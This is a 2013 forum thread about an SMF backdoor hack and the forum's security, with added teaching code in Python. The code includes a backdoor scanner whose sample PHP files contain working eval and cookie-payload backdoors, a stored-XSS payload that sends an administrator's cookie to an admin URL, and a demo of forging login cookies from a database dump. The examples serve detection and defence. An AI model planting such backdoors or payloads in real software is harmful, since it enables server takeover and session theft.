HellDiverUK
October 08, 2013, 07:21:29 AM

Quote: So, if there are so many problems with SMF, why does theymos still use it? There must be some open-source forum software that could be used.

Usually laziness. Most forum software will import the database from other forums. There's plenty - phpBB is the biggest one. OK, it has its problems too, but it's being worked on constantly by the developers.

phelix
Legendary
Activity: 1708
Merit: 1020
October 08, 2013, 07:45:09 AM

Quote: SMF v2.0.2 has many vulnerabilities.

Yeah. SMF 2.x is basically 1.x with more features (i.e. more attack area) and a slightly more secure database escaping scheme. Upgrading probably isn't worthwhile unless we want the better license. 1.x makes perfect sense then. Maybe the sanitizing part can be backported/improved. Are there any logs of hacking action? When was the backdoor placed again? The big question is why was the backdoor revealed? Just for the lulz? Or was it a second hax0r?

Quote: Why not reveal it? It was going to be discovered eventually by those trying to fix the forum, and revealing that a two-year-old backdoor was used made it more difficult for theymos to claim it was some new, previously unheard-of exploit. There's some lulz to be had when you tell someone how you did something just after it happens and it still takes them days to find and fix the problem.

Because it will be fixed if you reveal it and you lose access. There are plenty of other much worse things the hacker could have done, that would even have made him money. Hopefully we are lucky and it was a gray hat. On the other hand - who would really want to call down the wrath of this forum...

myself
Legendary
Activity: 938
Merit: 1000
chaos is fun...damental :)
October 08, 2013, 07:55:37 AM

re-enable the BlackBox theme, this one is way too white

Signature (translated from the Spanish): The desperate declare that it was invented by the king who raged, because in it everything is rage upon rage, vexation upon vexation, grief upon grief; if someone who buys a few lots sees them fall, he rages at having bought; if they rise, he rages that he did not buy more; if he buys, they rise, he sells, he profits, and they fly to an even higher price than the one he sold at: he rages that he sold for a lower price; if he neither buys nor sells and they keep rising, he rages that, having had the impulse to buy, he never acted on the impulse; if they keep falling, he rages that, having had the inkling to sell, he did not resolve to profit from the inkling; if he is given advice and it proves right, he rages that it was not given earlier; if it proves wrong, he rages that it was given at all; so that everything is unease, everything regret, everything delirium, the unbearable forever struggling with the happy, the untamed with the tranquil, and the furious with the delightful.

TsuyokuNaritai
October 08, 2013, 08:00:37 AM

Quote: re-enable the BlackBox theme, this one is way too white

+1.

greyhawk
October 08, 2013, 08:17:12 AM

Quote: Because it will be fixed if you reveal it and you lose access.

Not if you've got more than the backdoor you revealed.

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Activity: 1316
Merit: 1043
👻
October 08, 2013, 08:22:27 AM

The backdoor is specific to the forum. It's probably something as simple as eval() with certain arguments passed in obscure and unintended methods.

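The post above describes the classic shape of a PHP backdoor: request data reaching eval() through some unexpected path. The scanner below is an added example written for this page, not code from the forum or from SMF. The PHP snippets it scans are constructed for the example (file names borrowed from SMF's layout only as plausible-looking paths), and the regexes are triage heuristics: they flag request data reaching an execution sink on the same line, the preg_replace /e modifier, dynamic calls on decoded input, and function names assembled from string fragments. It does not follow data across lines, so it is a first pass to point a reviewer at suspicious files, not a proof of cleanliness.

```python
import re
from dataclasses import dataclass

# Constructed PHP fragments; the paths are hypothetical, not real SMF files.
SAMPLES = {
    "Sources/Subs.php": """<?php
// benign: request value cast to int and escaped on output
$topic = (int) $_REQUEST['topic'];
echo htmlspecialchars($topic);
""",
    "Themes/default/index.template.php": """<?php
// backdoor: request data straight into eval(), hidden in theme code
if (isset($_REQUEST['bb'])) { @eval(stripslashes($_REQUEST['bb'])); }
""",
    "Sources/Load.php": """<?php
// backdoor: function name built from fragments, payload base64-wrapped in a cookie
$f = 'ev' . 'al';
$f(base64_decode($_COOKIE['SMFCookie999']));
""",
    "Sources/Search.php": """<?php
// backdoor: the /e modifier makes preg_replace evaluate the replacement as PHP
preg_replace('/.*/e', $_POST['q'], '');
""",
}

SINKS = r"\b(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open|create_function)\s*\("
SUPERGLOBALS = r"\$_(?:GET|POST|COOKIE|REQUEST|SERVER|FILES)\b"
DECODERS = r"\b(?:base64_decode|str_rot13|gzinflate|gzuncompress|convert_uu)\w*\s*\("
DYNAMIC_CALL = r"\$\w+\s*\("                      # $f(...): callee chosen at runtime
PREG_PATTERN = r"""preg_replace\s*\(\s*['"]([^'"]*)['"]"""   # first argument of preg_replace
E_MODIFIER = r"/[a-zA-Z]*e[a-zA-Z]*$"                # trailing modifiers contain 'e'
CONCAT_NAME = r"""['"][A-Za-z]{1,4}['"]\s*\.\s*['"][A-Za-z]{1,6}['"]"""  # 'ev' . 'al'


@dataclass
class Finding:
    path: str
    line: int
    reason: str


def scan_php(path, source):
    """Return a list of Findings for one PHP file (empty when nothing is suspicious)."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("//") or stripped.startswith("#"):
            continue  # comments mentioning eval() are not evidence
        tainted = re.search(SUPERGLOBALS, line) is not None
        if re.search(SINKS, line) and tainted:
            findings.append(Finding(path, n, "request data reaches an execution sink"))
        m = re.search(PREG_PATTERN, line)
        if m and re.search(E_MODIFIER, m.group(1)):
            findings.append(Finding(path, n, "preg_replace with /e modifier (evaluates replacement)"))
        if re.search(DYNAMIC_CALL, line) and (tainted or re.search(DECODERS, line)):
            findings.append(Finding(path, n, "dynamic function call on decoded/request data"))
        if re.search(CONCAT_NAME, line):
            findings.append(Finding(path, n, "function name assembled from string fragments"))
    return findings


def scan_tree(files):
    """Scan a mapping of path -> PHP source; returns path -> list of Findings."""
    return {path: scan_php(path, src) for path, src in files.items()}


if __name__ == "__main__":
    for path, found in scan_tree(SAMPLES).items():
        for f in found:
            print(f"{f.path}:{f.line}: {f.reason}")
```

In practice the stronger check is the one Maged describes further down the thread: diff the deployed tree against a pristine copy of the same release tarball and treat every unexplained change as hostile. A scanner like this is only useful for the files that should differ (themes, local modifications) and for a quick look at a box you cannot rebuild yet.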
Maged
Legendary
Activity: 1204
Merit: 1015
October 08, 2013, 05:52:33 PM

Quote: Because it will be fixed if you reveal it and you lose access.

Quote: Not if you've got more than the backdoor you revealed.

You would have to have an additional whole SMF exploit to safely reveal your access, because when backdoors are suspected, people usually sanitize everything - just as we did here. Not even a backdoor embedded in the BIOS would have survived the cleanup that theymos did, since we completely changed hardware and rebuilt everything from the ground up. A backdoor in the database might still exist, but theymos looked pretty hard for those. So, other than that, the only way this guy is getting back in is if he has an exploit that anyone could have found.

Quote: The backdoor is specific to the forum. It's probably something as simple as eval() with certain arguments passed in obscure and unintended methods.

Probably...

clock27
October 08, 2013, 06:07:41 PM

Very happy the forum is back up. Keep up the good work.

thechevalier
Newbie
Activity: 40
Merit: 0
October 08, 2013, 07:03:50 PM

Great job recovering from the hack!

I know how hard it is to keep an SMF forum secure. I ran a much smaller forum on SMF, and it was a constant battle (both SMF 1 and 2). Eventually, I switched to something else that was easier (for me) to keep secure.

(I'm not suggesting changing to another forum package is the right thing to do here, as it sounds like you have a really good understanding of SMF security vulnerabilities and how to mitigate attacks now, and that's really the most important thing.)

Baitty
October 08, 2013, 10:16:29 PM

Glad it's back up. I lost all information on bitcoin because this is where I get most of it.

Currently held as collateral by monbux

BitPirate
Full Member
Activity: 238
Merit: 100
RMBTB.com: The secure BTC:CNY exchange. 0% fee!
October 09, 2013, 01:12:19 AM
Last edit: October 09, 2013, 02:39:10 AM by BitPirate

Quote: Don't fool yourself into a false sense of security. SMF v2.0.2 has many vulnerabilities.

It seems like you are referring to the same vulnerabilities referenced in this thread: http://www.simplemachines.org/community/index.php?topic=482530.0

The SMF Project Manager had this to say about it:

Quote: this is, essentially, BS... not because it's not true... but because in order to take advantage of it, the person needs to already have access to the admin section... and if you have full access to the admin section, you already have access to ALL of the users' data and the ability to upload packages - so this "injection" complaint is really kinda silly.

Quote: Not that I really care if we update or not, because I can understand the advantages and disadvantages of both actions. But I would like to see something happen to make this forum a bit more secure.

This reads to me like they don't understand the dangers of XSS. Which is kinda worrying if that is an official response. The advisory describes a persistent XSS flaw in the Admin section. The comment about admins already having access is completely off the mark. XSS attacks are always executed in the context of the privileged user. The validation flaw could be behind bloody Fort Knox -- it doesn't matter in the slightest; the attack is still exactly the same as if it were in the front-end. That forum thread is a face-palm. If you need a reason to move away from SMF, there it is.

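BitPirate's point is that the place where a stored XSS payload is written and the place where it fires are different: an ordinary member writes it, an administrator's browser runs it. The snippet below is an added example, not code from SMF or from the thread, that models that in miniature: constructed member records, a member-list page only admins can open, a vulnerable renderer beside a hardened one. The hardened version goes slightly beyond plain escaping by also allow-listing URL schemes, because a `javascript:` href survives HTML escaping unchanged.

```python
import html
from urllib.parse import urlsplit

# Constructed records. Member 2 is an ordinary user who set a hostile display
# name and website; nothing here required admin rights to store.
MEMBERS = [
    {"id": 1, "name": "admin", "website": "https://example.org", "is_admin": True},
    {"id": 2,
     "name": "mallory<script>fetch('/index.php?action=admin&sa=packages&c='+document.cookie)</script>",
     "website": "javascript:alert(document.cookie)",
     "is_admin": False},
]


def render_member_row_vulnerable(m):
    # Raw interpolation: whatever the member stored is emitted as markup.
    return f'<tr><td><a href="{m["website"]}">{m["name"]}</a></td></tr>'


def safe_url(url):
    # Escaping cannot neutralise a javascript: URL; the scheme must be allow-listed.
    return url if urlsplit(url).scheme in ("http", "https") else "#"


def render_member_row_hardened(m):
    name = html.escape(m["name"], quote=True)          # text context
    href = html.escape(safe_url(m["website"]), quote=True)  # attribute context
    return f'<tr><td><a href="{href}">{name}</a></td></tr>'


def render_admin_member_list(viewer, renderer):
    """The admin-only page. The access check is correct and irrelevant to the bug:
    the payload runs in the viewer's browser with the viewer's session."""
    if not viewer["is_admin"]:
        raise PermissionError("admin section")
    return "<table>" + "".join(renderer(m) for m in MEMBERS) + "</table>"


def contains_active_markup(page):
    """Crude check for markup that would execute in a browser."""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    admin = MEMBERS[0]
    print("vulnerable executes:", contains_active_markup(render_admin_member_list(admin, render_member_row_vulnerable)))
    print("hardened executes:  ", contains_active_markup(render_admin_member_list(admin, render_member_row_hardened)))
```

The `fetch` in the constructed payload is there to make the threat concrete: once code runs in the admin's session it can drive any admin action, including the package upload the SMF comment treated as the thing an attacker would already need.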
duhosnyul
October 09, 2013, 12:11:10 PM

Thanks Theymos and others who help maintain this forum.

tspacepilot
Legendary
Activity: 1456
Merit: 1081
I may write code in exchange for bitcoins.
October 09, 2013, 02:52:24 PM

Quote: So, if there are so many problems with SMF, why does theymos still use it? There must be some open-source forum software that could be used. At least in that case the skills of the thousands of people using this forum and offering opinions about the code could be put to some profitable use. Right?

Someone must have a good answer.

stormlighter
October 09, 2013, 03:58:06 PM

Glad BTCT is up and running again. Lock all staff/admin accounts to 1 IP. That's one way to prevent exploits if someone were to get the password for an admin account. Admins would be forced to use the same IP via a VPN or proxy service.

greyhawk
October 09, 2013, 04:09:23 PM

Quote: Glad BTCT is up and running again

You may want to take another look at that.

stormlighter
October 09, 2013, 04:17:27 PM

Heh.. well, I use it without any plugins or add-ons and whatnot. Access to the forum is all I need.

jeffhuys
October 09, 2013, 05:40:24 PM

Quote: Glad BTCT is up and running again

Quote: You may want to take another look at that.

It was such an awesome site. I hate it.

sdp
October 10, 2013, 05:23:45 AM

I wonder if the fact that this site was brought down at the same time as Silk Road was any more of a coincidence.

Coinsbank: Left money in their custodial wallet for my signature. Then they kept the money.

sdp
October 10, 2013, 11:21:15 AM

Quote: Login with only the hash? That basically allows any admin to impersonate another user. How could SMF think that was a good idea??

An administrator can by definition do anything. It is sometimes useful if you want to do something on a user's behalf or for testing whether permissions are respected correctly.

Coinsbank: Left money in their custodial wallet for my signature. Then they kept the money.

snappa4ever
October 10, 2013, 01:37:59 PM

Quote: Login with only the hash? That basically allows any admin to impersonate another user. How could SMF think that was a good idea??

Quote: An administrator can by definition do anything. It is sometimes useful if you want to do something on a user's behalf or for testing whether permissions are respected correctly.

By default the administrator has the power to do that. If not, the admin can go to phpMyAdmin and change the hash to another known hash, log in using the new password, and change the hash back after the login.

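The last three posts turn on one design property: if a login cookie can be computed from nothing but fields in the members table, the stored password hash is a bearer credential, and anyone who can read that table (an admin, an SQL injection, a leaked backup) can log in as anyone without knowing a password. The example below is added here and is not SMF's code; the thread does not give SMF's exact cookie construction, so scheme A is a generic model of "cookie derived only from stored hash plus salt" with sha1 chosen as an assumption. Scheme B is the usual fix: a random session id whose hash alone is stored server-side, so reading the database yields nothing that logs in.

```python
import hashlib
import hmac
import secrets
import time

# --- Scheme A: cookie is a pure function of values in the members table ---
# Construction is an assumption for this example, not a description of SMF.

def store_password(username, password):
    """What the members table would hold for a new account."""
    return {
        "passwd": hashlib.sha1((username.lower() + password).encode()).hexdigest(),
        "password_salt": secrets.token_hex(4),
    }


def cookie_from_hash(member_id, record):
    """Cookie the server mints after a successful password check."""
    digest = hashlib.sha1((record["passwd"] + record["password_salt"]).encode()).hexdigest()
    return f"{member_id}:{digest}"


def verify_cookie_from_hash(cookie, members):
    member_id, digest = cookie.split(":", 1)
    record = members.get(int(member_id))
    if record is None:
        return False
    expected = hashlib.sha1((record["passwd"] + record["password_salt"]).encode()).hexdigest()
    return hmac.compare_digest(digest, expected)


def forge_from_db_dump(member_id, members):
    """Attacker path: with read access to the table, mint a cookie for any member.
    No password is ever needed; the hash itself is the credential."""
    return cookie_from_hash(member_id, members[member_id])


# --- Scheme B: random session id; the database keeps only its hash ---
SESSIONS = {}  # sha256(session id) -> (member_id, expiry): this is what the DB holds


def issue_session(member_id, ttl=3600):
    sid = secrets.token_urlsafe(32)                  # 256 bits from the OS CSPRNG
    key = hashlib.sha256(sid.encode()).hexdigest()   # a DB reader sees only this
    SESSIONS[key] = (member_id, time.time() + ttl)
    return sid                                       # goes to the browser, never stored


def verify_session(sid):
    key = hashlib.sha256(sid.encode()).hexdigest()
    entry = SESSIONS.get(key)
    if entry is None or entry[1] < time.time():
        return None
    return entry[0]


def revoke_all_sessions():
    """After a compromise, scheme B is one call; under scheme A every user
    must change their password before the old cookies stop working."""
    SESSIONS.clear()


if __name__ == "__main__":
    members = {1: store_password("alice", "correct horse"), 2: store_password("bob", "battery staple")}
    print("forged cookie for bob accepted:", verify_cookie_from_hash(forge_from_db_dump(2, members), members))
    sid = issue_session(2)
    print("session table leaks the id?     ", sid in SESSIONS)
```

If an "act as this user" feature is genuinely wanted, the right shape is an explicit, logged impersonation action that issues a scheme-B session for the target, not a credential scheme where reading a table is equivalent to knowing every password.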